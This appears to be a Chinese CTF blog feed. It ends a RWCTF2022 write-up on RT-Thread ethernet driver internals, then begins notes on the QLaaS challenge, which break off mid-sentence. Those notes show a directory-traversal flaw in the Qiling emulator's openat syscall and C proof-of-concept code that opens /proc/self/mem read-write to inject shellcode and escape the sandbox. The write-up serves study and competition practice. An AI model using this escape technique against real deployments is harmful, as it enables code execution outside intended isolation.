*/</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device</span> parent;</span><br><span class="line">    <span class="comment">/* interface address info. */</span></span><br><span class="line">    <span class="type">rt_uint8_t</span> enetaddr[MAX_ADDR_LEN];         <span class="comment">/* MAC address  */</span></span><br><span class="line"></span><br><span class="line">    <span class="type">uint32_t</span> iobase;</span><br><span class="line">    <span class="type">uint32_t</span> irqno;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>这里存在一个 parent 结构体，类似于 C++ 中的继承，表示了一个具体的以太网设备。而该 <code>eth_device</code> 结构体源码如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">eth_device</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">/* inherit from rt_device */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">rt_device</span> parent;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* network interface for lwip */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">netif</span> *netif;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">rt_semaphore</span> tx_ack;</span><br><span class="line"></span><br><span class="line">    <span class="type">rt_uint16_t</span> flags;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  link_changed;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  link_status;</span><br><span class="line">    <span class="type">rt_uint8_t</span>  rx_notice;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* eth device interface */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">pbuf</span>* (*eth_rx)(<span class="type">rt_device_t</span> dev);</span><br><span class="line">    <span class="built_in">rt_err_t</span> (*eth_tx)(<span class="type">rt_device_t</span> dev, <span class="keyword">struct</span> pbuf* p);</span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> __cplusplus</span></span><br><span class="line"><span class="keyword">extern</span> <span class="string">&quot;C&quot;</span> &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_ready</span><span class="params">(<span class="keyword">struct</span> eth_device* dev)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_init</span><span class="params">(<span class="keyword">struct</span> eth_device * dev, <span class="type">const</span> <span class="type">char</span> *name)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_init_with_flag</span><span class="params">(<span class="keyword">struct</span> eth_device *dev, <span class="type">const</span> <span class="type">char</span> *name, <span class="type">rt_uint16_t</span> flag)</span></span>;</span><br><span class="line">    <span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_linkchange</span><span class="params">(<span class="keyword">struct</span> eth_device* dev, <span class="type">rt_bool_t</span> up)</span></span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">int</span> <span class="title">eth_system_device_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> __cplusplus</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这个结构体描述了一个抽象的以太网设备接口，其中这些函数指针在 lwIP 层会被调用。</p><p>注意到最后 <code>smc911x_emac_hw_init</code> 函数执行了一下 <code>eth_device_init</code> 函数，而该函数最终会调用到 <code>smc911x_emac_init</code> 函数，在其中<strong>注册中断处理例程 smc911x_isr</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">rt_hw_interrupt_install</span>(emac-&gt;irqno, smc911x_isr, emac, <span class="string">&quot;smc911x&quot;</span>);</span><br></pre></td></tr></table></figure><p>当以太网设备有数据发出中断后，中断处理例程 <code>smc911x_isr</code> 被调用，如果数据准备好了，则调用 <code>eth_device_ready</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">smc911x_isr</span><span class="params">(<span class="type">int</span> vector, <span class="type">void</span> *param)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> status;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">eth_device_smc911x</span> *emac;</span><br><span class="line"></span><br><span class="line">    emac = <span class="built_in">SMC911X_EMAC_DEVICE</span>(param);</span><br><span class="line"></span><br><span class="line">    status = <span class="built_in">smc911x_reg_read</span>(emac, LAN9118_INT_STS);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (status &amp; LAN9118_INT_STS_RSFL)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">eth_device_ready</span>(&amp;emac-&gt;parent);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">smc911x_reg_write</span>(emac, LAN9118_INT_STS, status);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> ;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>而 <code>eth_device_ready</code> 函数会发送邮件给 erx 线程：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">rt_err_t</span> <span class="title">eth_device_ready</span><span class="params">(<span class="keyword">struct</span> eth_device* dev)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (dev-&gt;netif)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="keyword">if</span>(dev-&gt;rx_notice == RT_FALSE)</span><br><span class="line">        &#123;</span><br><span class="line">            dev-&gt;rx_notice = RT_TRUE;</span><br><span class="line">            <span class="comment">// 发送邮件给 erx 线程</span></span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">rt_mb_send</span>(&amp;eth_rx_thread_mb, (<span class="type">rt_ubase_t</span>)dev);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">return</span> RT_EOK;</span><br><span class="line">        <span class="comment">/* post message to Ethernet thread */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> -RT_ERROR; <span class="comment">/* netif is not initialized yet, just return. */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这样，整个流程就全部出来了，正对上了最上面的那个流程图。</p><h2 id="八、参考">八、参考</h2><ul><li><a href="https://www.bilibili.com/video/BV1D3411b7XY">揭秘VxWorks路由器破解之路 - 长亭 bilibili</a></li><li><a href="http://blog.r0b.re/ctf/pwn/arm/iot/goahead/backdoor/2022/01/23/realworldctf-flag.html">FLAG (PWN 451) RealWorldCTF - Sauercl0ud</a></li><li><a href="https://www.rt-thread.org/document/site/#/rt-thread-version/rt-thread-standard/application-note/components/network/an0010-lwip-driver-porting?id=%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E6%A0%88%E9%A9%B1%E5%8A%A8%E7%A7%BB%E6%A4%8D%E7%AC%94%E8%AE%B0">网络协议栈驱动移植笔记 - RT-Thread 文档中心</a></li><li><a href="http://blog.yanick.site/2021/03/25/os/rt-thread/rt-thread/">RT-Thread 简明阅读 - Yanick’s Blog</a></li><li><a href="https://club.rt-thread.org/ask/question/3392.html">RTT+LWIP icmp流</a></li></ul><h2 id="九、鸣谢">九、鸣谢</h2><p>特别感谢<strong>呆呆师傅的 FLAG 题解技术分享</strong>。</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;p&gt;这里是复盘 RWCTF2022 中 FLAG 题时所写下的一些笔记。&lt;/p&gt;
&lt;p&gt;由于这题较为复杂，因此需要单独开一个博文来记录。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;联合作者：sakura&lt;/p&gt;
&lt;/blockquote&gt;
</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn 笔记1</title>
    <link href="https://kiprey.github.io/2022/01/rwctf2022_qws/"/>
    <id>https://kiprey.github.io/2022/01/rwctf2022_qws/</id>
    <published>2022-01-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.094Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里是复盘 RWCTF2022 关于:</p><ul><li>QLaas</li><li>Who Moved My Block</li><li>SVME</li></ul><p>这三道题时所写下的一些笔记。</p><blockquote><p>受限于时间与效率，一部分题目的 exp 将不再贴出，只会记录下解题或利用的详细流程。</p></blockquote><!-- more ---><h2 id="二、QLaas">二、QLaas</h2><h3 id="1-QLaas-小叙">1. QLaas 小叙</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Qiling as a Service.</span><br><span class="line">nc 47.242.149.197 7600</span><br><span class="line">QLaaS_61a8e641694e10ce360554241bdda977.tar.gz</span><br><span class="line">Note: read flag using /readflag</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:Schrödinger</span><br></pre></td></tr></table></figure><p>该题只给了一个这样的脚本，用于读取用户传来的文件并<strong>将其放入麒麟沙箱</strong>（rootfs 为一个临时文件夹）：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> tempfile</span><br><span class="line"><span class="comment"># pip install qiling==1.4.1</span></span><br><span class="line"><span class="keyword">from</span> qiling <span class="keyword">import</span> Qiling</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">my_sandbox</span>(<span class="params">path, rootfs</span>):</span><br><span class="line">    ql = Qiling([path], rootfs)</span><br><span class="line">    ql.run()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    sys.stdout.write(<span class="string">&#x27;Your Binary(base64):\n&#x27;</span>)</span><br><span class="line">    line = sys.stdin.readline()</span><br><span class="line">    binary = base64.b64decode(line.strip())</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">with</span> tempfile.TemporaryDirectory() <span class="keyword">as</span> tmp_dir:</span><br><span class="line">        fp = os.path.join(tmp_dir, <span class="string">&#x27;bin&#x27;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(fp, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            f.write(binary)</span><br><span class="line"></span><br><span class="line">        my_sandbox(fp, tmp_dir)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure><p>题目要求：<strong>执行</strong> <code>/readflag</code> 来获取 flag（注意不是直接读取 /flag）</p><h3 id="2-qiling-框架环境配置">2. qiling 框架环境配置</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下拉麒麟框架</span></span><br><span class="line">git <span class="built_in">clone</span> git@github.com:qilingframework/qiling.git</span><br><span class="line"><span class="built_in">cd</span> qiling</span><br><span class="line"><span class="comment"># 在麒麟框架代码中放入题目附件</span></span><br><span class="line">nano main.py</span><br><span class="line"><span class="comment"># 创建自己的 exp</span></span><br><span class="line"><span class="built_in">touch</span> exp.cpp</span><br><span class="line"></span><br><span class="line"><span class="comment"># 装个 PyCharm （别用 VSCode 调试）</span></span><br></pre></td></tr></table></figure><h3 id="3-漏洞点">3. 漏洞点</h3><p>unicorn 框架是 qiling 框架的核心，qiling 还在该基础之上额外实现了很多功能，包括与 OS 的一些交互操作等等。qiling 自己实现了一系列 syscall 调用，并让沙箱程序通过这些 qiling syscall 来间接与 OS 进行交互。</p><p>但倘若这些 qiling syscall 内部存在缺陷，那么沙箱程序便可以通过这些 syscall 进行沙箱逃逸。</p><p>qiling 默认会在执行沙箱程序时，将沙箱程序内部调用的 syscall 日志输出：</p><p><img src="/2022/01/rwctf2022_qws/image-20220124202600131.png" alt="image-20220124202600131"></p><p>这样，通过字符串搜索 + 动态调试并结合信息搜索，我们可以得出这些 syscall in posix 的实现是位于 <code>qiling/qiling/os/posix/syscall/</code> 文件夹下。接下来便是代码审计 + 调试了。</p><p>通过 <s>被大佬带飞</s> 审计与调试，我们可以发现在 <code>ql_syscall_openat</code> 函数中存在<strong>目录穿越漏洞</strong>。为了说明这个目录穿越，我们先简单的使用 open 函数来写个程序跑跑看看 qiling 的逻辑:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd = <span class="built_in">open</span>(<span class="string">&quot;../../../../../../../../proc/self/&quot;</span>, O_RDONLY, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如上图，实际所调用的 syscall 不是 SYS_open，而是 SYS_openat。</p><p>当调用 <code>ql_syscall_openat</code>时，实际进行文件打开的操作位于函数 <code>ql.os.fs_mapper.open_ql_file</code>：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">ql_syscall_openat</span>(<span class="params">ql: Qiling, fd: <span class="built_in">int</span>, path: <span class="built_in">int</span>, flags: <span class="built_in">int</span>, mode: <span class="built_in">int</span></span>):</span><br><span class="line">    file_path = ql.os.utils.read_cstring(path)</span><br><span class="line">    <span class="comment"># real_path = ql.os.path.transform_to_real_path(path)</span></span><br><span class="line">    <span class="comment"># relative_path = ql.os.path.transform_to_relative_path(path)</span></span><br><span class="line"></span><br><span class="line">    flags &amp;= <span class="number">0xffffffff</span></span><br><span class="line">    mode &amp;= <span class="number">0xffffffff</span></span><br><span class="line"></span><br><span class="line">    idx = <span class="built_in">next</span>((i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(NR_OPEN) <span class="keyword">if</span> ql.os.fd[i] == <span class="number">0</span>), -<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> idx == -<span class="number">1</span>:</span><br><span class="line">        regreturn = -EMFILE</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> ql.archtype== QL_ARCH.ARM:</span><br><span class="line">                mode = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">            flags = ql_open_flag_mapping(ql, flags)</span><br><span class="line">            fd = ql.unpacks(ql.pack(fd))</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> <span class="number">0</span> &lt;= fd &lt; NR_OPEN:</span><br><span class="line">                dir_fd = ql.os.fd[fd].fileno()</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                dir_fd = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">            <span class="comment"># 注意：在这里打开实际的文件，并将打开的文件描述符放入 fd array 中</span></span><br><span class="line">            ql.os.fd[idx] = ql.os.fs_mapper.open_ql_file(file_path, flags, mode, dir_fd)</span><br><span class="line"></span><br><span class="line">            regreturn = idx</span><br><span class="line">        <span class="keyword">except</span> QlSyscallError <span class="keyword">as</span> e:</span><br><span class="line">            regreturn = -e.errno</span><br><span class="line">            </span><br><span class="line">    ql.log.debug(<span class="string">f&#x27;openat(fd = <span class="subst">&#123;fd:d&#125;</span>, path = <span class="subst">&#123;file_path&#125;</span>, mode = <span class="subst">&#123;mode:#o&#125;</span>) = <span class="subst">&#123;regreturn:d&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> regreturn</span><br></pre></td></tr></table></figure><p>继续读读 <code>ql.os.fs_mapper.open_ql_file</code> 函数源码。由于我们是尝试打开正常的文件，因此走下面 <code>else</code> 分支：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">open_ql_file</span>(<span class="params">self, path, openflags, openmode, dir_fd=<span class="literal">None</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="variable language_">self</span>.has_mapping(path):</span><br><span class="line">        <span class="variable language_">self</span>.ql.log.info(<span class="string">f&quot;mapping <span class="subst">&#123;path&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._open_mapping_ql_file(path, openflags, openmode)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 进入该分支</span></span><br><span class="line">        <span class="keyword">if</span> dir_fd:</span><br><span class="line">            <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(path, openflags, openmode, dir_fd=dir_fd)</span><br><span class="line"></span><br><span class="line">        real_path = <span class="variable language_">self</span>.ql.os.path.transform_to_real_path(path)</span><br><span class="line">        <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(real_path, openflags, openmode)</span><br></pre></td></tr></table></figure><p>如果不存在 <code>dir_fd</code>，则调用 <code>transform_to_real_path</code> 函数将传入的 path 转换为真正的 path，即绝对路径。而调用 <code>transform_to_real_path</code> 处理 path 的调用链如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">convert_for_native_os, path.py:<span class="number">106</span></span><br><span class="line">convert_path, path.py:<span class="number">114</span></span><br><span class="line">transform_to_real_path, path.py:<span class="number">131</span></span><br><span class="line">open_ql_file, mapper.py:<span class="number">106</span></span><br><span class="line">ql_syscall_openat, fcntl.py:<span class="number">108</span></span><br><span class="line">[....]</span><br></pre></td></tr></table></figure><p>最终，qiling 会在 <code>convert_for_native_os</code> 函数中，<strong>过滤掉无效的目录穿越路径</strong>。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@staticmethod</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">convert_for_native_os</span>(<span class="params">rootfs: <span class="type">Union</span>[<span class="built_in">str</span>, Path], cwd: <span class="built_in">str</span>, path: <span class="built_in">str</span></span>) -&gt; Path:</span><br><span class="line">    _rootfs = Path(rootfs)          <span class="comment"># _rootfs : /tmp/tmpldhylv0h</span></span><br><span class="line">    _cwd = PurePosixPath(cwd[<span class="number">1</span>:])   <span class="comment"># _cwd : .</span></span><br><span class="line">    _path = Path(path)              <span class="comment"># _path : ../../../../../../../../proc/self</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> _path.is_absolute():</span><br><span class="line">        <span class="keyword">return</span> _rootfs / QlPathManager.normalize(_path)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 走该分支，返回 /tmp/tmpldhylv0h/proc/self</span></span><br><span class="line">        <span class="keyword">return</span> _rootfs / QlPathManager.normalize(_cwd / _path.as_posix())</span><br></pre></td></tr></table></figure><p>之后在上面的 <code>open_ql_file</code> 函数中，调用 <code>ql_file.open</code> 函数来与 OS 交互，而该函数是没有任何路径过滤的：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@classmethod</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">open</span>(<span class="params">cls, open_path: AnyStr, open_flags: <span class="built_in">int</span>, open_mode: <span class="built_in">int</span>, dir_fd: <span class="built_in">int</span> = <span class="literal">None</span></span>):</span><br><span class="line">    open_mode &amp;= <span class="number">0x7fffffff</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="comment"># 传入进来的路径直接与 OS 交互，无任何过滤</span></span><br><span class="line">        fd = os.<span class="built_in">open</span>(open_path, open_flags, open_mode, dir_fd=dir_fd)</span><br><span class="line">    <span class="keyword">except</span> OSError <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">raise</span> QlSyscallError(e.errno, e.args[<span class="number">1</span>] + <span class="string">&#x27; : &#x27;</span> + e.filename)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> cls(open_path, fd)</span><br></pre></td></tr></table></figure><p>这样看来，qiling openat syscall 没法路径穿越？非也。注意到 <code>open_ql_file</code> 函数中的这句代码：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">open_ql_file</span>(<span class="params">self, path, openflags, openmode, dir_fd=<span class="literal">None</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="variable language_">self</span>.has_mapping(path):</span><br><span class="line">        <span class="variable language_">self</span>.ql.log.info(<span class="string">f&quot;mapping <span class="subst">&#123;path&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._open_mapping_ql_file(path, openflags, openmode)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 如果存在 dir fd</span></span><br><span class="line">        <span class="keyword">if</span> dir_fd:</span><br><span class="line">            <span class="comment"># 则 path 将直接与 OS 进行交互，没有经过任何过滤</span></span><br><span class="line">            <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(path, openflags, openmode, dir_fd=dir_fd)</span><br><span class="line"></span><br><span class="line">        real_path = <span class="variable language_">self</span>.ql.os.path.transform_to_real_path(path)</span><br><span class="line">        <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(real_path, openflags, openmode)</span><br></pre></td></tr></table></figure><p>因此如果我们在调用 qiling openat syscall 时传入一个恶意的目录穿透路径，那就可以进行<strong>目录穿透攻击</strong>！</p><p>动手试一试：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> root_fd = <span class="built_in">open</span>(<span class="string">&quot;/&quot;</span>, O_RDONLY);</span><br><span class="line">    <span class="type">int</span> mem_fd = <span class="built_in">openat</span>(root_fd, <span class="string">&quot;../../../../proc/self/mem&quot;</span>, O_RDWR, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>可以发现两个 SYS_openat 均执行成功，可以达到目录穿越的效果：</p><p><img src="/2022/01/rwctf2022_qws/image-20220124212115135.png" alt="image-20220124212115135"></p><p>目录穿越后，我们便可以尝试读写任意文件。</p><p>注意到 flag 只能通过执行 <code>/readflag</code> 来获取，因此我们可以尝试对 <code>/proc/self/mem</code> 进行读写。</p><p>该文件是进程的内存内容，修改该文件等同于直接修改该进程的虚拟地址空间，我们可以试着将自己的 shellcode 放入代码段中并执行。</p><p>需要注意的是，该文件<strong>不能直接读取</strong>，需要结合 <strong>/proc/self/maps</strong> 的映射信息来确定读的偏移值。即无法读取未被映射的区域。</p><h3 id="4-利用流程">4. 利用流程</h3><p>利用流程如下：</p><ul><li>第一次执行：读取 <code>/proc/self/exe</code>，将远程机器上的 python 二进制文件 dump 到本地，获取其 